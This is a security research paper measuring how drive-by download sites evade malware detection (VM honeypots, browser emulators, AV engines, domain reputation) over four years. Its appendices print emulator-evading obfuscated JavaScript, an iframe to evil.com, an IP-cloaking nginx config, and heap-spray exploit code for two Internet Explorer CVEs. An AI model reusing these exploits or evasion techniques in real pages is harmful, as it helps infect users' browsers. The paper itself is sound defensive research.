Rajab 2011a PDF
Figure 1: The diagram shows a high-level overview of Google's web-malware detection system. VMs collect data from web pages and store it in a database for analysis. PageScorer leverages multiple scorers to determine if a web page is malicious.

content; see Section 4.1.2. Next, PageScorer instructs a Browser Emulator to reprocess the content that was retrieved by the VM to identify exploits. The Browser Emulator uses the stored content as a cache and thus does not make any network fetches; see Section 4.1.1. Finally, PageScorer uses a decision tree classifier to combine the output of the VM, AV Engines, Reputation Scorer, and Browser Emulator to determine whether the page attempted to exploit the browser; see Figure 1. The output of PageScorer, including whether the page caused new processes to be spawned, whether it was flagged by AV engines, which exploits it contained, and whether it matched Domain Reputation data, is stored along with the original data from the VM for future analysis.

A description of our VM-based honeypots and AV engine integration has been previously published [16, 17]. Since then we have added Browser Emulation and a Domain Reputation pipeline, which we briefly summarize below to familiarize the reader with the data collection process.

4.1.1 Browser Emulation

Our Browser Emulator is a custom implementation similar to other mainstream emulators, including PhoneyC [13] and JSAND [3]. We thus believe that its performance is representative of Browser Emulators in general.

Briefly, the Browser Emulator is built on top of a custom HTML parser and a modified open-source JavaScript engine. It constructs a DOM and event model that is similar to Internet Explorer. To ensure a faithful representation of IE, we have modified all parsers to handle IE-specific constructs; for examples, see Appendix A. The Emulator detects exploits against both the browser and the plug-ins by monitoring calls to known-vulnerable components, as well as by monitoring DOM accesses.

The emulator can also perform fine-grained tracing of JavaScript execution. When running in tracing mode, it records every function call and the arguments to those calls; e.g., we record which DOM functions were called and which arguments were passed to them. This allows for more detailed analysis of exploitation techniques, which we explore later in the paper.

4.1.2 Domain Reputation

The domain reputation pipeline runs periodically and analyzes the output of AV engines and the Browser Emulator to determine which sites are responsible for launching exploits and serving malware. We call these sites Distribution Domains. The pipeline employs a decision-tree classifier to decide whether a site is a distribution domain. Features include, for example, whether we have seen

4.2 Data Collection

In order to study evasion trends we leverage two distinct data sets. The first set, Data Set I, is the data that is generated by our operational pipeline, i.e., the output of PageScorer. It was generated by processing ∼1.6 billion distinct web pages collected between December 1, 2006 and April 1, 2011. This data is useful for studying trends that we observe in real time. The limitation with this data is that we continuously tweak our algorithms to improve detection, thus any trends observed from Data Set I could be due either to changes in the web pages that we are processing, or to improvements to our algorithms. To eliminate this uncertainty, we introduce our second data set, Data Set II.

Data Set II is created as follows. First, we select a group of pages from Data Set I. We sample pages from the time period between December 1, 2006 and October 12, 2010 that were marked as suspicious by the VM-based honeypot, the Browser Emulator, the AV scanners, or our Reputation data. Note that this does not mean PageScorer classified these pages as malicious. For example, if an AV engine flagged a page but the other scoring components did not, then the page would not be classified as bad by PageScorer, but it would be added to the sample. In this way the sample includes every bad page that our pipeline processed over the four-year period, as well as some other "suspicious" pages. In addition to these pages, our sample also includes 1% of other "non-suspicious" pages selected uniformly at random from the same time period.

For each of these pages, we rescore the original HTTP responses and VM state changes that were stored in our database using a fixed version of PageScorer from the end of October 2010. This version consisted of algorithms and data files, including AV signature files, from the end of the data collection period. By fixing the scorer we ensure that any observable trends are due to changes in the data, and are not due to the evolution of our algorithms. The output of this rescore comprises Data Set II.

In sum, Data Set II consists of ∼160 million distinct web pages from ∼8 million sites. We enabled JavaScript tracing on a subset of this data, comprising ∼75 million web pages from ∼5.5 million distinct sites.

In this paper the term site refers to a domain name unless the domain corresponds to a hosting provider. In the latter case, different host names are indicative of separate content owners, so we take the host name as the site. For example, http://www.cnn.com/ and http://live.cnn.com/ both correspond to the site cnn.com, whereas http://foo.blogspot.com/page1.html and http://bar.blogspot.com/page2.html are mapped to foo.blogspot.com and bar.blogspot.com, respectively. Throughout this paper we provide statistics at the site level, and aggregate data by month. We do this to avoid skew that could occur if our sampling algorithm selected many pages from the same site. For example, if the system encountered exploits in a given month on two URLs that belong to the same site, we count only one exploit.
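The paper does not publish its site-mapping code, but the rule above can be sketched as follows (the hosting-provider list and helper name are our own illustration; a production version would consult the full public-suffix list rather than a naive two-label heuristic):

```javascript
// Map a URL to its "site" per Section 4.2: the domain name, except on
// hosting providers, where each host name is a separate content owner.
// The provider list below is illustrative, not the paper's actual list.
const HOSTING_PROVIDERS = new Set(["blogspot.com", "wordpress.com"]);

function siteForUrl(url) {
  const host = new URL(url).hostname;        // e.g. "foo.blogspot.com"
  const labels = host.split(".");
  const domain = labels.slice(-2).join("."); // naive eTLD+1
  return HOSTING_PROVIDERS.has(domain) ? host : domain;
}

console.log(siteForUrl("http://live.cnn.com/"));               // cnn.com
console.log(siteForUrl("http://foo.blogspot.com/page1.html")); // foo.blogspot.com
```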
[Figures 2 and 3 appear here: unique sites per month (y-axis: number of sites), December 2006 through July 2010; plotted series include Unique Sites, Unique Sites w/ JS Tracing, Unique Bad Sites, Distribution, and Social Engineering.]
Figure 2: The graph shows the total number of sites per month in Data Set II. The large spike in 2008 is due to the unexpected appearance of a benign process that caused many more pages to be included in our analysis during that time.

Figure 3: The graph shows the number of sites involved in Social Engineering attacks compared to all sites hosting malware or exploits.
Figure 4: The heat map shows the relative distribution of exploits encountered on the web over time. Every second CVE is labeled on the Y-axis.

less likely as exploitable vulnerabilities were present in all versions of Internet Explorer and popular plugins during the course of our study. Regardless of the motive, social engineering poses a challenge to VM-based honeypots and must be accounted for.

Countermeasures. These results show that VM honeypots without user interaction may not detect web pages distributing malware via social engineering. In addition to simulating user interaction with the VM, one can also improve detection by pursuing a signature-based approach [18].

5.2 Browser Emulation Circumvention

We hypothesize that drive-by download campaigns primarily employ two tactics to circumvent Browser Emulation: rapid incorporation of zero-day exploits, and heavy obfuscation that targets differences between the emulator and a browser. We consider both in this section.

Exploit Trends. Once a vulnerability becomes public, it is quickly integrated into exploit kits. As a result, Browser Emulators need to be updated frequently to detect new vulnerabilities. To highlight the changing nature of exploitation on the web, we show the relative prevalence of each of the 51 exploits identified by our Browser Emulator in Data Set II in Figure 4. We see that 24 exploits are relatively short lived and are often replaced with newer exploits when new vulnerabilities are discovered. The main exception to this is the exploit of the MDAC vulnerability, which is part of most exploit kits we encounter and is represented by the dark line at the bottom of the heat map. This data highlights an important opportunity for evasion. Each time a new exploit is introduced, adversaries have a window to evade Browser Emulators until they are updated. Of the 51 exploits that we tracked, the median delay between public disclosure (as recorded at http://web.nvd.nist.gov/) and the first time the exploit appeared in Data Set II was 20 days. However, many exploits appear in the wild even before the corresponding vulnerability is publicly announced. Table 1 shows the 20 CVEs that have the shortest delay between public announcement and when the exploit appeared in Data Set II.

Obfuscation. To thwart a Browser Emulator, exploit kits typically wrap the code that exercises the exploit in a form of obfuscation that may not execute correctly in an emulated environment, but will work correctly in a real browser. This generally results in complex run-time behavior. To measure whether adversaries are turning to such techniques we examined the data that was generated with JavaScript tracing enabled in Data Set II and computed three different complexity measures:

• Number of function calls measures the number of JavaScript function calls made in a trace.

• Length of strings passed to function calls measures the sum of the lengths of all strings that are passed to any user-defined or built-in JavaScript function.

• DOM Interaction measures the total number of DOM methods called and DOM properties referenced as the JavaScript executes.

We first consider the number of JavaScript function calls made when evaluating a page. To establish a baseline we counted the number of function calls made during normal page load for each of the benign web pages in Data Set II. We also counted the number of function calls made before delivering the first exploit for each of the malicious pages in Data Set II. As our analysis is based on sites rather than individual web pages, we compute the average value for sites on which we encounter multiple web pages in a given month. While sites with exploits are less frequent than benign sites, our analysis finds between ∼50 and ∼150 thousand unique sites containing exploits per month, with the exception of the first few months in 2007 where the overall number of analyzed sites is smaller.

Figures 5 and 6 show the 20%, 50% and 80% quantiles for the number of function calls for both benign and malicious web sites. In Figure 5, we see an order of magnitude increase in the number of JavaScript function calls for benign sites. Figure 6 shows a change of over three orders of magnitude for the median for sites that deliver exploits. At the beginning of 2007, we observed about 20 JavaScript function calls, but the number of function calls jumped to ∼7,000 in 2008, and again to ∼70,000 in December 2009.

The number of JavaScript function calls in Figure 6 exhibits several distinct peaks and valleys. These can be explained by two phenomena. First, certain exploits require setup that employs more function calls than others. The decreases in the number of function calls in Autumn 2008, and again at the end of 2010, correspond to the increasing prevalence of exploits against RealPlayer (CVE-2008-1309) and a memory corruption vulnerability in IE (CVE-2010-0806). The proof-of-concept exploits that were wrapped into
Figure 5: The graph shows the number of JavaScript function calls for benign web sites. Over the measurement period, we observe an order of magnitude increase for the median.

Figure 6: The graph shows the number of JavaScript function calls for web sites with exploits. We count only the function calls leading up to the first exploit. We observe an increase of over three orders of magnitude for the median over the measurement period.
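To make the three complexity measures concrete, here is a small sketch computed over a hypothetical trace format (an array of { fn, args, isDom } records); the paper's tracer is built into its JavaScript engine, so this format and the helper are our own illustration:

```javascript
// Compute the Section 5.2 complexity measures over a recorded trace.
// Trace format (hypothetical): one { fn, args, isDom } record per call.
function complexityMeasures(trace) {
  let functionCalls = 0;   // total JavaScript function calls
  let stringLength = 0;    // summed length of all string arguments
  let domInteractions = 0; // calls that touch the DOM
  for (const call of trace) {
    functionCalls += 1;
    for (const arg of call.args) {
      if (typeof arg === "string") stringLength += arg.length;
    }
    if (call.isDom) domInteractions += 1;
  }
  return { functionCalls, stringLength, domInteractions };
}

const trace = [
  { fn: "unescape",      args: ["%u0c0c%u0c0c"], isDom: false },
  { fn: "createElement", args: ["img"],          isDom: true  },
  { fn: "setAttribute",  args: ["src", "x.gif"], isDom: true  },
];
console.log(complexityMeasures(trace));
// { functionCalls: 3, stringLength: 23, domInteractions: 2 }
```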
Figure 7: The graph shows the string length complexity measure on benign pages.

Figure 8: The graph shows the string length complexity measure on pages with exploits.
exploit kits made few function calls, spraying the heap with simple string concatenation. However, the increased counts at the beginning of 2009 and early 2010 correspond to exploits targeting two other memory corruption bugs in IE, CVE-2009-0075 and CVE-2010-0249. The proof-of-concept for these exploits prepared memory by allocating many DOM nodes with attacker-controlled data, and thus required many function calls to launch the exploit; see Appendices C and D for example source code.

The second phenomenon that explains the general upward trend is the appearance of new JavaScript packers that obfuscate code using cryptographic routines such as RSA and RC4, which make many function calls. To trigger an exploit, it is usually not necessary to call many functions. For example, our system encountered exploits for CVE-2010-0806 for the first time in March 2010. At that time, the median number of function calls to exploit the vulnerability was only 7, whereas the median rose to 813 in July 2010. Thus we attribute the rise in complexity to obfuscation meant to thwart emulation or manual analysis.

Next we consider the total string length complexity measure. See Figures 7 and 8 for this metric on benign and malicious pages, respectively. As with the number of function calls, we see a general upward trend. We believe these trends are influenced more by packers than by choice of exploit. The reason for this is that heap sprays generally do not pass long strings to method calls; more often they concatenate strings or add strings to arrays. Thus, these trends measure changes in packers over time. Clearly, as the size of exploit kits and the complexity of packing algorithms grow, so does the total amount of data that must be deobfuscated.

Another way to assess the complexity of JavaScript is to determine which DOM functions are called before reaching an exploit. This measurement captures obfuscation that probes the implementation of a Browser Emulator for completeness. We instrumented our JavaScript engine to record the usage of 34 DOM functions and properties that are commonly used or involved in DOM manipulations; see Appendix E. We then compute the relative frequency of these calls for both benign pages and pages that deliver exploits. Figures 9 and 10 show heat maps plotting the relative frequencies of each DOM function or property. The darkness of each entry represents the fraction of sites that utilize that specific DOM function or property.

Figure 9: The heat map shows the DOM functions utilized by benign web pages over time.

Figure 10: The heat map shows the DOM functions utilized by exploit JavaScript over time.
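A toy version of this DOM-usage recording, with a stub document standing in for the instrumented engine (the stub and its two methods are our own illustration; the paper labels 34 functions and properties, listed in Appendix E):

```javascript
// Count how often labeled DOM entry points are used, as in the DOM
// Interaction heat maps. The stub "document" lets the sketch run outside
// a browser; the real instrumentation lives inside the JavaScript engine.
function makeCountingDom() {
  const counts = {};
  const record = (name) => { counts[name] = (counts[name] || 0) + 1; };
  const document = {
    createElement(tag) { record("createElement"); return { tag }; },
    getElementById(id) { record("getElementById"); return null; },
  };
  return { document, counts };
}

const { document, counts } = makeCountingDom();
document.createElement("img");
document.createElement("div");
document.getElementById("handle");
console.log(counts); // { createElement: 2, getElementById: 1 }
```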
For benign pages, the number of DOM accesses has increased as the web has become more interactive and feature rich. For benign web sites, we note that the indices of the most common functions are 3 and 13, which refer to document.body and getElementById respectively. DOM access patterns for sites that deliver exploits are remarkably different, as significantly fewer DOM interactions are found. Two indices, 7 and 31, stand out. They refer to createElement and setAttribute respectively. These two functions are employed to exploit MDAC (CVE-2006-0003) [8], which has been popular since 2006 and is part of most exploit kits. While Figure 9 shows that the clearAttributes function is not commonly used in benign web pages, we see a sudden increase of it in exploits in February 2009. This coincides with the public release of exploits targeting CVE-2009-0075; see Appendix C.

Further examination of this exploit indicates that the delivery mechanism has been updated over time to exercise an increasing number of DOM API functions. When the exploit was first released, it made use of only the three functions that are necessary to launch the exploit: createElement, clearAttributes, and cloneNode (we did not label cloneNode as a function of interest during our analysis). Over time, however, there was a steady uptick in the number of non-essential DOM functions that were called before delivering the payload; see Figure 11. Starting in March 2010, about 20% of sites exploiting this vulnerability also make calls to appendChild and read innerHTML. In May 2010, more DOM functions are called to stage the exploit. This change in behavior indicates that the JavaScript to stage the exploit has become more complex, likely to thwart analysis.

Figure 11: The heat map shows the DOM functions utilized to exploit CVE-2009-0075. The graph shows that only two DOM functions are required to trigger the exploit, but that over time the DOM interactions have become more complex.

Countermeasures. The trends in exploitation technique and each of the complexity measures indicate that the perpetrators of drive-by download campaigns are devoting significant effort towards evading detection. In order to keep pace with zero-days and obfuscation techniques, Browser Emulators should be frequently updated. To facilitate such updates, it is possible to monitor the system for unexpected errors or to compare its output to AV engines or a VM infrastructure to identify potential deficiencies. One could also rely on these other technologies to address inherent limitations; for instance, VM honeypots can be used to detect zero-days. We analyze the relative performance of our Browser Emulator in Section 6.

5.3 AV Circumvention

AV engines commonly use signature-based detection to identify malicious code. While it is well-known that even simple packers can successfully evade this approach, we wanted to understand the impact of evasion techniques at a large scale. Specifically, we measured two aspects of evasion. First, we studied whether deobfuscating web content would significantly improve detection rates. Second, we studied how often AV vendors change their signatures to adapt to both False Positives and False Negatives.

To study the impact of deobfuscation, we leveraged our Browser Emulator and hooked all methods that allow for dynamic injection of code into the DOM, e.g., by recording assignment to innerHTML. The line labeled Deobfuscated in Figure 12 shows the percent of additional sites in Data Set II that were flagged by AV engines only after providing the engines with this injected content. This drastically improves performance of the AV engines, in some cases by
[Figures 12 and 13 appear here: Figure 12 plots monthly percentages with series Added, Removed, and Deobfuscated; Figure 13 plots distribution chain depth with Max, 90th, 50th, and 10th percentile series.]
Figure 12: The graph shows the monthly percentage of sites with changing virus signals between Data Set I and Data Set II.

Figure 13: The graph shows malware distribution chain length over time.
Figure 14: The graph shows how many compromised sites include content from cloaking sites in Data Set II.

Figure 15: The graph shows sites with Exploit and New Process signals.
Figure 16: The graph shows sites with Exploit and Virus signals.

Figure 17: The graph shows sites with New Process and Virus signals.
clude content from a site known to distribute malware labeled Reputation. From 2007 through 2008, 7.21% of sites had only a bad reputation signal. In 2009, this number increased to 36.5%, and in 2010 it increased to 48.5%. Note that the dramatic increase in sites only detected by cloaking corresponds to the jump in cloaking behavior in Figure 14. At the same time the number of sites with only BadSignals remains low, which implies that our system is able to bootstrap classification of domains that cloak with only a small amount of data.

Figure 18: The graph shows sites with bad signals vs sites that include content from a site with bad reputation.

7. CONCLUSION

Researchers have proposed numerous approaches for detecting the ever-increasing number of web sites spreading malware via drive-by downloads. Adversaries have responded with a number of techniques to bypass detection. This paper studies whether evasive practices are effective, and whether they are being pursued at a large scale.

Our study focuses on the four most prevalent detection techniques: Virtual Machine honeypots, Browser Emulation honeypots, Classification based on Domain Reputation, and Anti-Virus Engines. We measure the extent to which evasion affects each of these schemes by analyzing four years' worth of data collected by Google's SafeBrowsing infrastructure. Our experiments corroborate our hypothesis that malware authors continue to pursue delivery mechanisms that can confuse different malware detection systems. We find that Social Engineering is growing and poses challenges to VM-based honeypots. JavaScript obfuscation that interacts heavily with the DOM can be used to evade both Browser Emulators and AV engines. In operational settings, AV Engines also suffer significantly from both false positives and false negatives. Finally, we see a rise in IP cloaking to thwart content-based detection schemes.

Despite evasive tactics, we show that adopting a multi-pronged approach can improve detection rates. We hope that these observations will be useful to the research community. Furthermore, these findings highlight important design considerations for operational systems. For example, data that is served to the general public might trade higher false negative rates for reduced false positives. On the other hand, a private institution might tolerate higher false positive rates to improve protection. Furthermore, a system that serves more users might become a target of circumvention and thus need to devote extra effort to detect cloaking.

8. REFERENCES

[1] M. Antonakakis, R. Perdisci, D. Dagon, W. Lee, and N. Feamster. Building a Dynamic Reputation System for DNS. In Proceedings of the 19th USENIX Security Symposium, August 2010.
[2] F. Chang, J. Dean, S. Ghemawat, W. Hsieh, D. Wallach, M. Burrows, T. Chandra, A. Fikes, and R. Gruber. Bigtable: A distributed storage system for structured data. ACM Transactions on Computer Systems (TOCS), 26(2):1–26, 2008.
[3] M. Cova, C. Kruegel, and G. Vigna. Detection and analysis of drive-by-download attacks and malicious JavaScript code. In Proceedings of the 19th International Conference on World Wide Web, pages 281–290. ACM, 2010.
[4] M. Felegyhazi, C. Kreibich, and V. Paxson. On the Potential of Proactive Domain Blacklisting. In Proceedings of the 3rd USENIX Conference on Large-scale Exploits and Emergent Threats: Botnets, Spyware, Worms, and More, page 6. USENIX Association, 2010.
[5] Google. V8 JavaScript Engine. http://code.google.com/p/v8/.
[6] Microsoft. About Conditional Comments. http://msdn.microsoft.com/en-us/library/ms537512(v=vs.85).aspx.
[7] Microsoft. Conditional Compilation (JavaScript). http://msdn.microsoft.com/en-us/library/121hztk3(v=vs.94).aspx.
[8] Microsoft. Microsoft Security Bulletin MS06-014: Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution, May 2006.
[9] A. Moshchuk, T. Bragin, D. Deville, S. Gribble, and H. Levy. SpyProxy: Execution-based detection of malicious web content. In Proceedings of the 16th USENIX Security Symposium, pages 1–16. USENIX Association, 2007.
[10] A. Moshchuk, T. Bragin, S. Gribble, and H. Levy. A crawler-based study of spyware in the web. In Proceedings of the Network and Distributed Systems Security Symposium, 2006.
[11] Mozilla. JavaScript:TraceMonkey. https://wiki.mozilla.org/JavaScript:TraceMonkey.
[12] Mozilla. What is SpiderMonkey? http://www.mozilla.org/js/spidermonkey/.
[13] J. Nazario. PhoneyC: A virtual client honeypot. In Proceedings of the 2nd USENIX Conference on Large-scale Exploits and Emergent Threats: Botnets, Spyware, Worms, and More, page 6. USENIX Association, 2009.
[14] J. Oberheide, E. Cooke, and F. Jahanian. CloudAV: N-version Antivirus in the Network Cloud. In Proceedings of the 17th USENIX Security Symposium, pages 91–106. USENIX Association, 2008.
[15] The Honeynet Project. Capture-HPC. http://projects.honeynet.org/capture-hpc.
[16] N. Provos, P. Mavrommatis, M. A. Rajab, and F. Monrose. All Your iFRAMEs Point to Us. In USENIX Security Symposium, pages 1–16, 2008.
[17] N. Provos, D. McNamee, P. Mavrommatis, K. Wang, and N. Modadugu. The Ghost in the Browser: Analysis of Web-based Malware. In Proceedings of the First USENIX Workshop on Hot Topics in Understanding Botnets (HotBots'07), April 2007.
[18] M. A. Rajab, L. Ballard, P. Mavrommatis, N. Provos, and X. Zhao. The Nocebo Effect on the Web: An Analysis of Fake Anti-Virus Distribution. In Proceedings of the 3rd USENIX Workshop on Large-Scale Exploits and Emergent Threats (LEET), April 2010.
[19] Y.-M. Wang, D. Beck, X. Jiang, R. Roussev, C. Verbowski, S. Chen, and S. King. Automated web patrol with strider honeymonkeys. In Proceedings of the Network and Distributed Systems Security Symposium, pages 35–49, 2006.

APPENDIX

A. ANALYSIS-RESISTANT JAVASCRIPT

Here we provide examples of code from the wild that actively try to evade browser emulators. The code has been deobfuscated for readability purposes. As discussed in Section 3, there are at least three different browser characteristics that can be tested before delivering a payload: JavaScript environment, parser capabilities, and the DOM.

JavaScript Environment. IE's JavaScript environment is different than those provided by other open source JavaScript engines. For example, IE allows ; before a catch or finally clause in JavaScript, whereas SpiderMonkey will report a parse error.

try{} ; catch(e) {} bad();

IE also supports case-insensitive access to ActiveX object properties in JavaScript.

var obj=new ActiveXObject(objName);
obj.vAr=1; if (obj.VaR==1) bad();

Malicious web pages often identify emulators by testing that ActiveX creation returns sane values.

try {new ActiveXObject("asdf")} catch(e) {bad()}

IE also supports the execScript method, which evaluates code within the global scope, whereas other engines do not.

JavaScript and HTML Parsers. IE supports conditional compilation in JavaScript [7]; other browsers do not. Thus IE's JavaScript parser knows how to parse the following comment, and will generate code that calls the function bad() only in the 32-bit version of IE.

/* @cc_on
@if (@_win32)
bad();
@end
@ */

IE also supports conditional parsing in its HTML parser. Conditional comments allow IE to execute code contingent upon version numbers [6].

<!--[if IE 9]><iframe src=http://evil.com/</iframe><![endif]-->

Integration between the HTML parser and the scripting environment may also be tested by examining the behavior of document.write. The output of this call should be immediately handled by the parser, and any side effects should be immediately propagated to the JavaScript environment.

document.write("<div id=d></div>")
if (d.tagName=="DIV") bad()

The DOM. There are many ways in which the DOM can be probed for feature-completeness. The snippet from the figure below was found in the wild. It tests that the DOM implementation yields the correct tree-like structure, even in the face of misnested close tags. It also verifies that the title variable is correctly exposed within the document object.

<html><head><title>split</title></head><body>
<b id="node" style="display:none;">999999qq
<i>99999999qqf<i>rom<i>Ch<i>a</i>rC</i>o</i>
d</i>e</i>qq</i>ev</i>alqqwin<i>do</i>w</b>
<script>
function nfc(node) {
  var r = "";
  for(var i=0; i<node.childNodes.length; i++) {
    switch(node.childNodes[i].nodeType) {
      case 1: r+=nfc(node.childNodes[i]); break;
      case 3: r+=node.childNodes[i].nodeValue;
    }
  }
  return r;
}
var nf = nfc(node)[document.title]("qq");
</script>
<script>
window["cccevalccc".substr(3,4)]("var nf_window="+nf[4]);
var data = "qq10qq118qq97[...]";
var data_array = data[document.title]("qq");
var jscript = "";
for (var i=1; i<data_array.length; i++)
  jscript+=String[nf[2]](data_array[i]);
nf_window[nf[3]](jscript);
</script>

B. IP-BASED CLOAKING

An nginx configuration file for disallowing requests from certain IP addresses.

user apache;
worker_processes 2;

http {
  ...
  #//G
  deny XXX.XXX.160.0/19;
  deny XXX.XXX.0.0/20;
  deny XXX.XXX.64.0/19;
  ...
  server {
    listen 8080;
    location / {
      proxy_pass http://xxxxx.com:4480;
      proxy_redirect off;
      proxy_ignore_client_abort on;
      proxy_set_header X-Real-IP $remote_addr;
      proxy_set_header Host $host;
      proxy_buffers 100 50k;
      proxy_read_timeout 300;
      proxy_send_timeout 300;
    }
  }
}

C. EXPLOIT FOR CVE-2009-0075

var sc = unescape("..."); // shellcode
var mem = new Array();
var ls = 0x100000 - (sc.length * 2 + 0x01020);
var b = unescape("%u0c0c%u0c0c");
while (b.length < ls / 2) b += b;
var lh = b.substring(0, ls / 2);
delete b;
for (i = 0; i < 0xc0; i++) mem[ i ] = lh + sc;
CollectGarbage();
var badsrc = unescape(
  "%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var imgs = new Array();
for (var i = 0; i < 1000; i++)
  imgs.push(document.createElement("img"));
obj1 = document.createElement("tbody");
obj1.click;
var obj2 = obj1.cloneNode();
obj1.clearAttributes();
obj1 = null;
CollectGarbage();
for (var i = 0; i < imgs.length; i++)
  imgs[i].src = badsrc;
obj2.click;

D. THE "AURORA" EXPLOIT

<html><head><script>
var evt = null;
// SKIPPED: Generate shellcode and spray the heap.
var a = new Array();
for (i = 0; i < 200; i++) {
  a[i] = document.createElement("COMMENT");
  a[i].data = "abcd";
}
function ev1(evt) {
  evt = document.createEventObject(evt);
  document.getElementById("handle").innerHTML = "";
  window.setInterval(ev2, 50);
}
function ev2() {
  var data = unescape(
    "%u0a0a%u0a0a%u0a0a%u0a0a" +
    "%u0a0a%u0a0a%u0a0a%u0a0a");
  for (i = 0; i < a.length; i++)
    a[i].data = data;
  evt.srcElement;
}
</script></head><body>
<span id="handle"><img src="foo.gif" onload="ev1(event)" />
</span></body></html>

Code to exploit the bug described by CVE-2010-0249. Emulating this correctly requires a proper DOM implementation and event model.

E. DOM FUNCTIONS

This appendix provides the listing of functions and properties that we labeled during JavaScript tracing. For properties, we differentiate between read and write access; e.g., reading the innerHTML property is different than writing to it.

0  addEventListener          17 hasAttribute
1  appendChild               18 hasChildNodes
2  attachEvent               19 innerHTML (read)
3  body (read)               20 innerHTML (write)
4  childNodes (read)         21 insertBefore
5  clearAttributes           22 lastChild (read)
6  createComment             23 nextSibling (write)
7  createElement             24 outerHTML (read)
8  createTextNode            25 outerHTML (write)
9  detachEvent               26 parentNode (read)
10 documentElement (read)    27 previousSibling (read)
11 firstChild (read)         28 removeAttribute
12 getAttribute              29 removeChild
13 getElementById            30 removeEventListener
14 getElementsByClassName    31 setAttribute
15 getElementsByName         32 text (read)
16 getElementsByTagName      33 text (write)
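As an annotation to the analysis-resistant snippet in Appendix A (our own reconstruction of its decoding steps, not from the paper): the page title is "split", so nfc(node)[document.title]("qq") simply splits the hidden text on "qq", recovering the strings the packer needs without ever writing eval or fromCharCode in the source.

```javascript
// Decoding steps of the Appendix A snippet, reconstructed for clarity.
// The misnested <i> tags flatten to this hidden text:
const hiddenText = "999999qq99999999qqfromCharCodeqqevalqqwindow";
const nf = hiddenText.split("qq"); // document.title is "split"
console.log(nf[2], nf[3], nf[4]);  // fromCharCode eval window

// The second script decodes "qq"-separated character codes; the paper
// truncates the payload to "qq10qq118qq97[...]", which starts:
const data = "qq10qq118qq97";
const codes = data.split("qq");    // ["", "10", "118", "97"]
let jscript = "";
for (let i = 1; i < codes.length; i++)
  jscript += String[nf[2]](codes[i]); // String.fromCharCode
console.log(JSON.stringify(jscript)); // "\nva"
```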